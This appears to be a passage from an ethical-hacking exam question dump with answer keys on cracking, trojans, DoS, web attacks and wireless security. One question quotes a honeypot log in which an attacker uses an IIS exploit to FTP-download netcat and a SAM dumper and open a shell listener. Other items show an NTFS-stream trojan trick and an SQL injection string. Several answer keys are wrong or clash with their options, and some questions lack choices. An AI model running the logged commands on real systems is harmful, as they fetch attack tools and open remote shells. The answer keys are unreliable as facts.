C. SNMPScan
D. Solarwinds IP Network Browser
E. NMap
A. SNMPUtil
B. SNScan
D. Solarwinds IP Network Browser
If a token and 4-digit personal identification number (PIN) are used to access a computer system
and the token performs off-line checking for the correct PIN, what type of attack is possible?
A. Birthday
B. Brute force
C. Man-in-the-middle
D. Smurf
B. Brute force
Which of the following algorithms can be used to guarantee the integrity of messages being sent,
in transit, or stored? (Choose the best answer)
A. symmetric algorithms
B. asymmetric algorithms
C. hashing algorithms
D. integrity algorithms
C. Hashing algorithms
You are attempting to crack LM Manager hashed from Windows 2000 SAM file. You will be using
LM Brute force hacking tool for decryption. What encryption algorithm will you be decrypting?
A. MD4
B. DES
C. SHA
D. SSL
B. DES
In the context of password security, a simple dictionary attack involves loading a dictionary file (a text file full of dictionary words) into a cracking application such as L0phtCrack or John the Ripper,
and running it against user accounts located by the application. The larger the word and word fragment selection, the more effective the dictionary attack is. The brute force method is the most inclusive, although slow. It usually tries every possible letter and number combination in its automated exploration. If you would use both brute force and dictionary methods combined together to have variation of words, what would you call such an attack?
C. Hybrid
What is the algorithm used by LM for Windows2000 SAM?

A. MD4
B. DES
C. SHA
D. SSL
B. DES
Which of the following is the primary objective of a rootkit?
A. It opens a port to provide an unauthorized service
B. It creates a buffer overflow
C. It replaces legitimate programs
D. It provides an undocumented opening in a program
C. It replaces legitimate programs.
This kind of password cracking method uses word lists in combination with numbers and special
characters:
A. Hybrid
B. Linear
C. Symmetric
D. Brute Force
A. Hybrid
_________ is a tool that can hide processes from the process list, can hide files, registry entries, and intercept keystrokes.

A. Trojan
B. RootKit
C. DoS tool
D. Scanner
E. Backdoor
B. Rootkit
What is the BEST alternative if you discover that a rootkit has been installed on one of your computers?
A. Copy the system files from a known good system
B. Perform a trap and trace
C. Delete the files and try to determine the source
D. Reload from a previous backup
E. Reload from known good media
E. Reload from known good media.
What do Trinoo, TFN2k, WinTrinoo, T-Sight, and Stracheldraht have in common?
A. All are hacking tools developed by the legion of doom
B. All are tools that can be used not only by hackers, but also security personnel
C. All are DDOS tools
D. All are tools that are only effective against Windows
E. All are tools that are only effective against Linux
C. All are DDoS tools.
How can you determine if an LM hash you extracted contains a password that is less than 8
characters long?
A. There is no way to tell because a hash cannot be reversed
B. The right most portion of the hash is always the same
C. The hash always starts with AB923D
D. The left most portion of the hash is always the same
E. A portion of the hash will be all 0's
B. The right-most portion of the hash is always the same.
When discussing passwords, what is considered a brute force attack?
A. You attempt every single possibility until you exhaust all possible combinations or discover the
password
B. You threaten to use the rubber hose on someone unless they reveal their password
C. You load a dictionary of words into your cracking program
D. You create hashes of a large number of words and compare it with the encrypted passwords
E. You wait until the password expires
A. You attempt every single possibility until you exhaust all possible combinations or discover the password.
Which of the following are well know password-cracking programs? (Choose all that apply.)
A. L0phtcrack
B. NetCat
C. Jack the Ripper
D. Netbus
E. John the Ripper
A. L0phtcrack
E. John the Ripper
Password cracking programs reverse the hashing process to recover passwords. (True/False.)
A. True
B. False
B. False
What is GINA?
A. Gateway Interface Network Application
B. GUI Installed Network Application CLASS
C. Global Internet National Authority (G-USA)
D. Graphical Identification and Authentication DLL
D. Graphical Identification adn Authentication DLL.
Why would you consider sending an email to an address that you know does not exist within the
company you are performing a Penetration Test for?
A. To determine who is the holder of the root account
B. To perform a DoS
C. To create needless SPAM
D. To illicit a response back that will reveal information about email servers and how they treat
undeliverable mail
E. To test for virus protection
D. To elicit a response that will reveal information about e-mail servers and how they treat undeliverable mail.
You are a Administrator of Windows server. You want to find the port number for POP3. What file
would you find the information in and where? Select the best answer.
A. %windir%\\etc\\services
B. system32\\drivers\\etc\\services
C. %windir%\\system32\\drivers\\etc\\services
D. /etc/services
E. %windir%/system32/drivers/etc/services
C. %windir%\\system32\\drivers\\etc\\services
One of your junior administrator is concerned with Windows LM hashes and password cracking. In
your discussion with them, which of the following are true statements that you would point out?
Select the best answers.
A. John the Ripper can be used to crack a variety of passwords, but one limitation is that the
output doesn't show if the password is upper or lower case.
B. BY using NTLMV1, you have implemented an effective countermeasure to password cracking.
C. SYSKEY is an effective countermeasure.
D. If a Windows LM password is 7 characters or less, the hash will be passed with the following
characters, in HEX- 00112233445566778899.
E. Enforcing Windows complex passwords is an effective countermeasure.
A. John the Ripper can be used to crack a variety of passwords, but one limitation is that the output doesn't show whether the password is upper or lower case.

C. SYSKEY is an effective countermeasure

E. Enforcing Windows' complex passwords is an effective countermeasure.
In the following example, which of these is the "exploit"? Today, Microsoft Corporation released a security notice. It detailed how a person could bring down the Windows 2003 Server operating system, by sending malformed packets to it. They detailed how this malicious process had been
automated using basic scripting. Even worse, the new automated method for bringing down the server has already been used to perform denial of service attacks on many large commercial websites. Select the best answer.
E. The documented method of how to use the vulnerability to gain unprivileged access.
Assuring two systems that are using IPSec to protect traffic over the internet, what type of general
attack could compromise the data?
A. Spoof Attack
B. Smurf Attack
C. Man in the Middle Attack
D. Trojan Horse Attack
E. Back Orifice Attack
D. Trojan Horse Attack
E. Back Orifice Attack
What is a Trojan Horse?
A. A malicious program that captures your username and password
B. Malicious code masquerading as or replacing legitimate code
C. An unauthorized user who gains access to your user database and adds themselves as a user
D. A server that is to be sacrificed to all hacking attempts in order to log and monitor the hacking
activity
B. Malicious code masquerading as, or replacing, legitimate code.
You want to use netcat to generate huge amount of useless network data continuously for various
performance testing between 2 hosts. Which of the following commands accomplish this?
A. Machine A #yes AAAAAAAAAAAAAAAAAAAAAA |nc -v -v -l -p 2222 > /dev/null Machine B
#yes BBBBBBBBBBBBBBBBBBBBBB | nc machinea 2222 > /dev/null
B. Machine A cat somefile |nc -v -v -l -p 2222 Machine B cat somefile | nc othermachine 2222
C. Machine Anc -l -p 1234 | uncompress -c | tar xvfp Machine B tar cfp - /some/dir | compress -c |
nc -w 3 machinea 1234
D. Machine A while true : do nc -v -l -s -p 6000 machineb 2 Machine B while true ; do nc -v -l -s -p
6000 machinea 2 done
A. Machine A #yes AAAAAAAAAAAAAAAAAAAAAA |nc -v -v -l -p 2222 > /dev/null Machine B
#yes BBBBBBBBBBBBBBBBBBBBBB | nc machinea 2222 > /dev/null
Which of the following statements would not be a proper definition for a Trojan Horse?
A. An unauthorized program contained within a legitimate program. This unauthorized program performs functions unknown (and probably unwanted) by the user.
B. A legitimate program that has been altered by the placement of unauthorized code within it; this code perform functions unknown (and probably unwanted) by the user.
C. An authorized program that has been designed to capture keyboard keystrokes while the user remains unaware of such an activity being performed.
D. Any program that appears to perform a desirable and necessary function but that (because of unauthorized code within it that is unknown to the user) performs functions unknown (and definitely unwanted) by the user.
C. An authorized program that has been designed to capture keyboard keystrokes while the user remains unaware of such an activity being performed.
You have hidden a Trojan file virus.exe inside another file readme.txt using NTFS streaming.
Which command would you execute to extract the Trojan to a standalone file?

A. c:\> type readme.txt:virus.exe > virus.exe
B. c:\> more readme.txt | virus.exe > virus.exe
C. c:\> cat readme.txt:virus.exe > virus.exe
D. c:\> list redme.txt$virus.exe > virus.exe
C. c:\> cat readme. txt : virus. exe > virus.exe
You suspect that your Windows machine has been compromised with a Trojan virus. When you
run anti-virus software it does not pick of the Trojan. Next you run netstat command to look for
open ports and you notice a strange port 6666 open. What is the next step you would do?
A. Re-install the operating system.
B. Re-run anti-virus software.
C. Install and run Trojan removal software.
D. Run utility fport and look for the application executable that listens on port 6666.
D. Run utility fport and look for the application executable that listens on port 6666.
In Linux, the three most common commands that hackers usually attempt to Trojan are:
A. car, xterm, grep
B. netstat, ps, top
C. vmware, sed, less
D. xterm, ps,nc
B. netstat. ps, top
Jason's Web server was attacked by a trojan virus. He runs protocol analyzer and notices that the
Trojan communicates to a remote server on the Internet. Shown below is the standard "hexdump"
representation of the network packet, before being decoded. Jason wants to identify the trojan by
looking at the destination port number and mapping to a trojan-port number database on the
Internet. Identify the remote server's port number by decoding the packet?
A. Port 1890 (Net-Devil Trojan)
B. Port 1786 (Net-Devil Trojan)
C. Port 1909 (Net-Devil Trojan)
D. Port 6667 (Net-Devil Trojan)
D. Port 6667 (Net-Devil Trojan)
Which of the following Netcat commands would be used to perform a UDP scan of the lower 1024
ports?
A. Netcat -h -U
B. Netcat -hU
C. Netcat -sU -p 1-1024
D. Netcat -u -v -w2 1-1024
E. Netcat -sS -O target/1024
D. Netcat -u -v -w2 1-1024
Sniffing is considered an active attack.
A. True
B. False
B. False
Erik notices a big increase in UDP packets sent to port 1026 and 1027 occasionally. He enters the following at the command prompt. $ nc -l -p 1026 -u -v In response, he sees the following
message. cell(?(c)???? STOPALERT77STOP! WINDOWS REQUIRES IMMEDIATE ATTENTION. Windows has found 47 Critical Errors. To fix the errors please do the following: 1.
Download Registry Repair from: www.reg-patch.com 2.
Install Registry Repair 3. Run Registry Repair 4. Reboot your computer FAILURE TO ACT NOW MAY LEAD TO DATA LOSS AND CORRUPTION!
What would you infer from this alert?
A. The machine is redirecting traffic to www.reg-patch.com using adware
B. It is a genuine fault of windows registry and the registry needs to be backed up
C. An attacker has compromised the machine and backdoored ports 1026 and 1027
D. It is a messenger spam. Windows creates a listener on one of the low dynamic ports from 1026 to 1029 and the message usually promotes malware disguised as legitimate utilities
D. It is a messenger spam. Windows creates a listener on one of the low dynamic ports from 1026
to 1029 and the message usually promotes malware disguised as legitimate utilities
A remote user tries to login to a secure network using Telnet, but accidently types in an invalid
user name or password. Which responses would NOT be preferred by an experienced Security
Manager? (multiple answer)
A. Invalid Username
B. Invalid Password
C. Authentication Failure
D. Login Attempt Failed
E. Access Denied
A. Invalid Username
B. Invalid Password.
A POP3 client contacts the POP3 server:
A. To send mail
B. To receive mail
C. to send and receive mail
D. to get the address to send mail to
E. initiate a UDP SMTP connection to read mail
B. To receive mail
Samantha was hired to perform an internal security test of pass4sure. She quickly realized that all networks are making use of switches instead of traditional hubs. This greatly limits her ability to gather information through network sniffing. Which of the following techniques can she use to gather information from the switched network or to disable some of the traffic isolation features of the switch? (Choose two)

A. Ethernet Zapping
B. MAC Flooding
C. Sniffing in promiscuous mode
D. ARP Spoofing
B. MAC flooding
D. ARP spoofing
Ethereal works best on ____________.
A. Switched networks
B. Linux platforms
C. Networks using hubs
D. Windows platforms
E. LAN's
C. Networks using hubs
The follows is an email header. What address is that of the true originator of the message?
Return-Path:
Received: from smtp.com (fw.emumail.com [215.52.220.122]. by raq-221-181.ev1.net
(8.10.2/8.10.2. with ESMTP id h78NIn404807 for ; Sat, 9 Aug 2003 18:18:50 -0500 Received:
(qmail 12685 invoked from network.; 8 Aug 2003 23:25:25 -0000 Received: from ([19.25.19.10]. by
smtp.com with SMTP Received: from unknown (HELO CHRISLAPTOP. (168.150.84.123. by
localhost with SMTP; 8 Aug 2003 23:25:01 -0000 From: "Bill Gates" To: "mikeg"
Subject: We need your help! Date: Fri, 8 Aug 2003 19:12:28 -0400 Message-ID:
<51.32.123.21@CHRISLAPTOP> MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="-
---
=_NextPart_000_0052_01C35DE1.03202950" X-Priority: 3 (Normal. X-MSMail-Priority: Normal
XMailer:
Microsoft Outlook, Build 10.0.2627 X-MimeOLE: Produced By Microsoft MimeOLE
V6.00.2800.1165 Importance: Normal
A. 19.25.19.10
B. 51.32.123.21
C. 168.150.84.123
D. 215.52.220.122
E. 8.10.2/8.10.2
C. 168.150.84.123
Which one of the following instigates a SYN flood attack?
A. Generating excessive broadcast packets.
B. Creating a high number of half-open connections.
C. Inserting repetitive Internet Relay Chat (IRC) messages.
D. A large number of Internet Control Message Protocol (ICMP) traces.
B. Creating a high number of half-open connections.
Global deployment of RFC 2827 would help mitigate what classification of attack?
A. Sniffing attack
B. Denial of service attack
C. Spoofing attack
D. Reconnaissance attack
E. Prot Scan attack
C. Spoofing attack
What happens when one experiences a ping of death?
A. This is when an IP datagram is received with the "protocol" field in the IP header set to 1
(ICMP) and the "type" field in the ICMP header is set to 18 (Address Mask Reply).
B. This is when an IP datagram is received with the "protocol" field in the IP header set to 1
(ICMP), the Last Fragment bit is set, and (IP offset ' 8) + (IP data length) >65535. In other words,
the IP offset (which represents the starting position of this fragment in the original packet, and
which is in 8-byte units) plus the rest of the packet is greater than the maximum size for an IP
packet.
C. This is when an IP datagram is received with the "protocol" field in the IP header set to 1
(ICMP) and the source equal to destination address.
D. This is whenan the IP header is set to 1 (ICMP) and the "type" field in the ICMP header is set to
5 (Redirect).
B. This is when an IP datagram is received with the "protocol" field in the IP header set to 1 (ICMP), the Last Fragment bit is set, and (IP offset '8) + (IP data length) >65535. In other words, the IP offset (which represents the starting position of this fragment in the original packet, and in which is in 8-byte units) plus the rest of the packet is greater than the maximum size for an IP packet.
Which one of the following network attacks takes advantages of weaknesses in the fragment
reassembly functionality of the TCP/IP protocol stack?
A. Teardrop
B. Smurf
C. Ping of Death
D. SYN flood
E. SNMP Attack
A. Teardrop
A denial of Service (DoS) attack works on the following principle:
A. MS-DOS and PC-DOS operating system utilize a weaknesses that can be compromised and permit them to launch an attack easily.
B. All CLIENT systems have TCP/IP stack implementation weakness that can be compromised and permit them to lunch an attack easily.
C. Overloaded buffer systems can easily address error conditions and respond appropriately.
D. Host systems cannot respond to real traffic, if they have an overwhelming number of incomplete connections (SYN/RCVD State).
E. A server stops accepting connections from certain networks one those network become flooded.
D. Host systems cannot respond to real traffic if they have an overwhelming number of incomplete connections (SYN / RCVD state)
What happens during a SYN flood attack?
A. TCP connection requests flood a target machine. The target machine is flooded with randomized source address & ports for the TCP ports.B. A TCP SYN packet, which is a connection initiation, is sent to a target machine, giving the
target host's address as both source and destination, and is using the same port on the target host as both source and destination.
C. A TCP packet is received with the FIN bit set but with no ACK bit set in the flags field.
D. A TCP packet is received with both the SYN and the FIN bits set in the flags field.
A. TCP connection requests flood a target machine. The target machine is flooded with randomized source address & ports for the TCP ports.
What is the term 8 to describe an attack that falsifies a broadcast ICMP echo request and includes
a primary and secondary victim?
A. Fraggle Attack
B. Man in the Middle Attack
C. Trojan Horse Attack
D. Smurf Attack
E. Back Orifice Attack
D. Smurf attack.
What is the goal of a Denial of Service Attack?
A. Capture files from a remote computer.
B. Render a network or computer incapable of providing normal service.
C. Exploit a weakness in the TCP stack.
D. Execute service at PS 1009.
B. Render a network or computer incapable of providing normal service.
What do you call a system where users need to remember only one username and password, and
be authenticated for multiple services?
A. Simple Sign-on
B. Unique Sign-on
C. Single Sign-on
D. Digital Certificate
C. Single Sign On.
What would best be defined as a security test on services against a known vulnerability database
using an automated tool?
A. A penetration test
B. A privacy review
C. A server audit
D. A vulnerability assessment
D. A vulnerability assessment.
A Buffer Overflow attack involves:
A. Using atrojan program to direct data traffic to the target host's memory stack
B. Flooding the target network buffers with data traffic to reduce the bandwidth available to
legitimate users
C. Using a dictionary to crack password buffers by guessing user names and passwords
D. Poorly written software that allows an attacker to execute arbitrary code on a target system
D. Poorly written software that allows an attacker to execute arbitrary code on a target system.
When working with Windows systems, what is the RID of the true administrator account?
A. 500
B. 501
C. 512
D. 1001
E. 1024
F. 1000
A. 500
If you send a SYN to an open port, what is the correct response? (Choose all correct answers.)
A. SYN
B. ACK
C. FIN
D. PSH
A. SYN
B. ACK
You have been called to investigate a sudden increase in network traffic at pass4sure. It seems
that the traffic generated was too heavy that normal business functions could no longer be
rendered to external employees and clients. After a quick investigation, you find that the computer
has services running attached to TFN2k and Trinoo software. What do you think was the most likely cause behind this sudden increase in traffic?
A. A distributed denial of service attack.
Peter is a Network Admin. He is concerned that his network is vulnerable to a smurf attack. What
should Peter do to prevent a smurf attack? Select the best answer.
A. He should disable unicast on all routers
B. Disable multicast on the router
C. Turn off fragmentation on his router
D. Make sure all anti-virus protection is updated on all systems
E. Make sure his router won't take a directed broadcast
E. Make sure his router won't take a directed broadcast.
Your boss at pass4sure.com asks you what are the three stages of Reverse Social Engineering.
A. Sabotage, advertising,Assisting
B. Sabotage, Advertising, Covering
C. Sabotage, Assisting, Billing
D. Sabotage, Advertising, Covering
A. Sabotage, Advertising, Assisting
What is the most common vehicle for social engineering attacks?
A. Phone
B. Email
C. In person
D. P2P Networks
A. Telephone
Usernames, passwords, e-mail addresses, and the location of CGI scripts may be obtained from
which of the following information sources?
A. Company web site
B. Search engines
C. EDGAR Database query
D. Whois query
A. Company website
What are the six types of social engineering? (Choose six).
A. Spoofing
B. Reciprocation
C. Social Validation
D. Commitment
E. Friendship
F. Scarcity
G. Authority
H. Accountability
B. Reciprocation
C. Social Validation
D. Commitment
E. Friendship
F. Scarcity
G. Authority
What does the following command achieve? Telnet HEAD /HTTP/1.0

A. This command returns the home page for the IP address specified
B. This command opens a backdoor Telnet session to the IP address specified
C. This command returns the banner of the website specified by IP address
D. This command allows a hacker to determine the sites security
E. This command is bogus and will accomplish nothing
C. This command returns the banner of the website specified by IP address
Which type of hacker represents the highest risk to your network?
A. script kiddies
B. grey hat hackers
C. black hat hackers
D. disgruntled employees
D. Disgruntled employees
John is using tokens for the purpose of strong authentication. He is not confident that his security
is considerably strong. In the context of Session hijacking why would you consider this as a false
sense of security?
A. The token based security cannot be easily defeated.
B. The connection can be taken over after authentication.
C. A token is not considered strong authentication.
D. Token security is not widely used in the industry.
B. The connection can be taken over after authentication.
What type of cookies can be generated while visiting different web sites on the Internet?
A. Permanent and long term cookies.
B. Session and permanent cookies.
C. Session and external cookies.
D. Cookies are all the same, there is no such thing as different type of cookies.
B. Session cookies and permanent cookies
What is Hunt used for?
A. Hunt is used to footprint networks
B. Hunt is used to sniff traffic
C. Hunt is used to hack web servers
D. Hunt is used to intercept traffic i.e. man-in-the-middle traffic
E. Hunt is used for password cracking
D. Hunt is used to intercept traffic. I.e. man in the middle attacks.
Tess King is making use of Digest Authentication for her Web site. Why is this considered to be
more secure than Basic authentication?
A. Basic authentication is broken
B. The password is never sent in clear text over the network
C. The password sent in clear text over the network is never reused.
D. It is based on Kerberos authentication protocol
B. The password is never sent in cleartext over the network.
You wish to determine the operating system and type of web server being used. At the same time
you wish to arouse no suspicion within the target organization. While some of the methods listed
below work, which holds the least risk of detection?
A. Make some phone calls and attempt to retrieve the information using social engineering.
B. Use nmap in paranoid mode and scan the web server.
C. Telnet to the web server and issue commands to illicit a response.
D. Use the netcraft web site look for the target organization's web site.
D. Use the netcraft website to look for the target organization's web site.
Which of the following buffer overflow exploits are related to Microsoft IIS web server? (Choose
three)
A. Internet Printing Protocol (IPP) buffer overflow
B. Code Red Worm
C. Indexing services ISAPI extension buffer overflow
D. NeXT buffer overflow
A. Internet Printing Protocol (IPP) buffer overflow
B. Code Red Worm
C. Indexing services ISAPI extension buffer overflow.
On a default installation of Microsoft IIS web server, under which privilege does the web server
software execute?
A. Everyone
B. Guest
C. System
D. Administrator
C. System
What are the three phases involved in security testing?
A. Reconnaissance, Conduct, Report
B. Reconnaissance, Scanning, Conclusion
C. Preparation, Conduct, Conclusion
D. Preparation, Conduct, Billing
C. Preparation, Conduct, Conclusion
You visit a website to retrieve the listing of a company's staff members. But you can not find it on
the website. You know the listing was certainly present one year before. How can you retrieve
information from the outdated website?
A. Through Google searching cached files
B. Through Archive.org
C. Download the website and crawl it
D. Visit customers' and prtners' websites
B. Through Archive.org
This kind of attack will let you assume a users identity at a dynamically generated web page or
site:
A. SQL Injection
B. Cross Site Scripting
C. Session Hijacking
D. Zone Transfer
B. Cross Site Scripting
____________ will let you assume a users identity at a dynamically generated web page or site.
A. SQL attack
B. Injection attack
C. Cross site scripting
D. The shell attack
E. Winzapper
C. Cross Site Scripting
What is Form Scalpel used for?
A. Dissecting HTML Forms
B. Dissecting SQL Forms
C. Analysis of Access Database Forms
D. Troubleshooting Netscape Navigator
E. Quatro Pro Analysis Tool
A. Dissecting HTML forms
Bubba has just accessed he preferred ecommerce web site and has spotted an item that he would
like to buy. Bubba considers the price a bit too steep. He looks at the source code of the webpage
and decides to save the page locally, so that he can modify the page variables. In the context of
web application security, what do you think Bubba has changes?
A. A hidden form field value.
B. A hidden price value.
C. An integer variable.
D. A page cannot be changed locally, as it is served by a web server
A. A hidden form field value.
Kevin sends an email invite to Chris to visit a forum for security professionals. Chris clicks on the link in the email message and is taken to a web based bulletin board. Unknown to Chris, certain functions are executed on his local system under his privileges, which allow Kevin access to information used on the BBS. However, no executables are downloaded and run on the local system. What would you term this attack?

A. Phishing
B. Denial of Service
C. Cross Site Scripting
D. Backdoor installation
C. Cross Site Scripting
You have just received an assignment for an assessment at a company site. Company's
management is concerned about external threat and wants to take appropriate steps to insure
security is in place. Anyway the management is also worried about possible threats coming from
inside the site, specifically from employees belonging to different Departments. What kind of
assessment will you be performing?
A. Black box testing
B. Black hat testing
C. Gray box testing
D. Gray hat testing
E. White box testing
F. White hat testing
C. Gray box testing
What does black box testing mean?
A. You have full knowledge of the environment
B. You have no knowledge of the environment
C. You have partial knowledge of the environment
B. You have no knowledge of the environment.
Say that "abigcompany.com" had a security vulnerability in the javascript on their website in the
past. They recently fixed the security vulnerability, but it had been there for many months. Is there
some way to 4go back and see the code for that error? Select the best answer.
A. archive.org
B. There is no way to get the changed webpage unless you contact someone at the company
C. Usenet
D. Javascript would not be in their html so a service like usenet or archive wouldn't help you
A. archive.org
Which of the following is the best way an attacker can passively learn about technologies used in
an organization?
A. By sending web bugs to key personnel
B. By webcrawling the organization web site
C. By searching regional newspapers and job databases for skill sets technology hires need to
possess in the organization
D. By performing a port scan on the organization's web site
C. By searching regional newspapers and job databases for skill sets technology hires need to possess in the organization.
The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort
reported Unicode attacks from 213.116.251.162. The file Permission Canonicalization vulnerability
(UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to
run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. He
then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user
to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS
server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly.
The attacker makes a RDS query which results in the commands run as shown below:
"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c echo quit >>ftpcom" "cmd1.exe /c
ftp -s:ftpcom" "cmd1.exe /c nc -l -p 6969 ecmd1.exe"
What can you infer from the exploit given?
A. It is a local exploit where the attacker logs in using username johna2k.
B. There are two attackers on the system - johna2k and haxedj00.
C. The attack is a remote exploit and the hacker downloads three files.
D. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port.
C. The attack is a remote exploit and the hacker downloads three files.
Bill is attempting a series of SQL queries in order to map out the tables within the database that he
is trying to exploit. Choose the attack type from the choices given below.
A. Database Fingerprinting
B. Database Enumeration
C. SQL Fingerprinting
D. SQL Enumeration
A. Database fingerprinting.
Your boss Tess King is attempting to modify the parameters of a Web-based application in order
to alter the SQL statements that are parsed to retrieve data from the database. What would you
call such an attack?
A. SQL Input attack
B. SQL Piggybacking attack
C. SQL Select attack
D. SQL Injection attack
D. SQL Injection attack
When a malicious hacker identifies a target and wants to eventually compromise this target, what
would be among the first steps that he would perform? (Choose the best answer)
A. Cover his tracks by eradicating the log files and audit trails.
B. Gain access to the remote computer in order to conceal the venue of attacks.
C. Perform a reconnaissance of the remote target for identical of venue of attacks.
D. Always begin with a scan in order to quickly identify venue of attacks.
C. Perform a reconnaissance of the remote target for identification of venue of attacks.
A particular database threat utilizes a SQL injection technique to penetrate a target system. How would an attacker use this technique to compromise a database?
A. An attacker uses poorly designed input validation routines to create or alter SQL commands to gain access to unintended data or execute commands of the database
B. An attacker submits user input that executes an operating system command to compromise a target system
C. An attacker gains control of system to flood the target system with requests, preventing legitimate users from gaining access
D. An attacker utilizes an incorrect configuration that leads to access with higher-than-expected privilege of the database
A. An attacker uses poorly designed input validation routines to create or alter SQL commands to gain access to unintended data or execute commands of the database.
Look at the following SQL query.
SELECT * FROM product WHERE PCategory='computers' or 1=1--'
What will it return? Select the best answer.
A. All computers and all 1's
B. All computers
C. All computers and everything else
D. Everything except computers
C. All computers and everything else.
Sandra is conducting a penetration test for pass4sure.com. She knows that pass4sure.com is
using wireless networking for some of the offices in the building right down the street. Through
social engineering she discovers that they are using 802.11g. Sandra knows that 802.11g uses
the same 2.4GHz frequency range as 802.11b. Using NetStumbler and her 802.11b wireless NIC,
Sandra drives over to the building to map the wireless networks. However, even though she
repositions herself around the building several times, Sandra is not able to detect a single AP.
What do you think is the reason behind this?
A. Netstumbler does not work against 802.11g.
B. You can only pick up 802.11g signals with 802.11a wireless cards.
C. The access points probably have WEP enabled so they cannot be detected.
D. The access points probably have disabled broadcasting of the SSID so they cannot be
detected.
E. 802.11g uses OFDM while 802.11b uses DSSS so despite the same frequency and 802.11b
card cannot see an 802.11g signal.
F. Sandra must be doing something wrong, as there is no reason for her to not see the signals.
A. Netstumbler does not work against 802.11g
WEP is used on 802.11 networks, what was it designed for?
A. WEP is designed to provide a wireless local area network (WLAN) with a level of security and
privacy comparable to what it usually expected of a wired LAN.
B. WEP is designed to provide strong encryption to a wireless local area network (WLAN) with a
lever of integrity and privacy adequate for sensible but unclassified information.
C. WEP is designed to provide a wireless local area network (WLAN) with a level of availability
and privacy comparable to what is usually expected of a wired LAN.
D. WEOP is designed to provide a wireless local area network (WLAN) with a level of privacycomparable to what it usually expected of a wired LAN
A. WEP is designed to provide a wireless local area network (WLAN) with a level of security and privacy comparable to what it usually expected of a wired LAN.
RC4 is known to be a good stream generator. RC4 is used within the WEP standard on wireless LAN. WEP is known to be insecure even if we are using a stream cipher that is known to be secured. What is the most likely cause behind this?
A. There are some flaws in the implementation.
B. There is no key management.
C. The IV range is too small.
D. All of the above.
E. None of the above.
D. All of the above
Which of the following is NOT a reason 802.11 WEP encryption is vulnerable?
A. There is no mutual authentication between wireless clients and access points
B. Automated tools like AirSnort are available to discover WEP keys
C. The standard does not provide for centralized key management
D. The 24 bit Initialization Vector (IV) field is too small
C. The standard does not provide for centralized key management.
Which of the following is true of the wireless Service Set ID (SSID)? (Select all that apply.)
A. Identifies the wireless network
B. Acts as a password for network access
C. Should be left at the factory default setting
D. Not broadcasting the SSID defeats NetStumbler and other wireless discovery tools
A. Identifies the wireless network
B. Acts as a password for network access
Which of the following wireless technologies can be detected by NetStumbler? (Select all that
apply)
A. 802.11b
B. 802.11e
C. 802.11a
D. 802.11g
E. 802.11
A. 802.11b
C. 802.11a
D. 802.11g
802.11b is considered a ____________ protocol.
A. Connectionless
B. Secure
C. Unsecure
D. Token ring based
E. Unreliable
C. Unsecure
Access control is often implemented through the use of MAC address filtering on wireless Access
Points. Why is this considered to be a very limited security measure?
A. Vendors MAC address assignment is published on the Internet.
B. The MAC address is not a real random number.
C. The MAC address is broadcasted and can be captured by a sniffer.
D. The MAC address is used properly only on Macintosh computers.
C. The MAC address is broadcast, and could be captured by a sniffer
In order to attack a wireless network, you put up an access point and override the signal of the real
access point. As users send authentication data, you are able to capture it. What kind of attack is
this?
A. Rouge access point attack
B. Unauthorized access point attack
C. War Chalking
D. WEP attack
A. Rogue Access Point Attack
Sally is a network admin for a small company. She was asked to install wireless accesspoints in
the building. In looking at the specifications for the access-points, she sees that all of them offer
WEP. Which of these are true about WEP? Select the best answer.
A. Stands for Wireless Encryption Protocol
B. It makes a WLAN as secure as a LAN
C. Stands for Wired Equivalent Privacy
D. It offers end to end security
C. Stands for Wired Equivalent Protocol
Joe Hacker is going wardriving. He is going to use PrismStumbler and wants it to go to a GPS
mapping software application. What is the recommended and well-known GPS mapping package
that would interface with PrismStumbler? Select the best answer.
A. GPSDrive
B. GPSMap
C. WinPcap
D. Microsoft Mappoint
A. GPSDrive
What are the main drawbacks for anti-virus software?
A. AV software is difficult to keep up to the current revisions.
B. AV software can detect viruses but can take no action.
C. AV software is signature driven so new exploits are not detected.
D. It's relatively easy for an attacker to change the anatomy of an attack to bypass AV systems
E. AV software isn't available on all major operating systems platforms.
F. AV software is very machine (hardware) dependent
C. AV software is signature driven, so new exploits are not detected.
What is the best means of prevention against viruses?
A. Assign read only permission to all files on your system.
B. Remove any external devices such as floppy and USB connectors.
C. Install a rootkit detection tool.
D. Install and update anti-virus scanner.
D. Install and update anti-virus scanner
The Slammer Worm exploits a stack-based overflow that occurs in a DLL implementing the
Resolution Service. Which of the following Database Server was targeted by the slammer worm?
A. Oracle
B. MSSQL
C. MySQL
D. Sybase
E. DB2
B. MSSQL
Which of the following is one of the key features found in a worm but not seen in a virus?
A. The payload is very small, usually below 800 bytes.
B. It is self replicating without need for user intervention.
C. It does not have the ability to propagate on its own.
D. All of them cannot be detected by virus scanners.
B. It is self-replicating, without the need for user intervention.
You find the following entries in your web log. Each shows attempted access to either root.exe or cmd.exe.
What caused this?

A. The Morris worm
B. The PIF virus
C. Trinoo
D. Nimda
E. Code Red
F. Ping of Death
D. Nimda
One of the better features of NetWare is the use of packet signature that includes cryptographic
signatures. The packet signature mechanism has four levels from 0 to 3. In the list below which of
the choices represent the level that forces NetWare to sign all packets?
A. 0 (zero)
B. 1
C. 2
D. 3
D. 3
If you receive a RST packet while doing an ACK scan, it indicates that the port is
open.(True/False).
A. True
B. False
A. True
If you perform a port scan with a TCP ACK packet, what should an OPEN port return?
A. RST
B. No Reply
C. SYN/ACK
D. FIN
A. RST
Pandora is used to attack __________ network operating systems.
A. Windows
B. UNIX
C. Linux
D. Netware
E. MAC OS
D. Netware
What is the name of the software tool used to crack a single account on Netware Servers using a
dictionary attack?
A. NPWCrack
B. NWPCrack
C. NovCrack
D. CrackNov
E. GetCrack
B. NWPCrack
Which of the following is NOT a valid NetWare access level?
A. Not Logged in
B. Logged in
C. Console Access
D. Administrator
D. Administrator
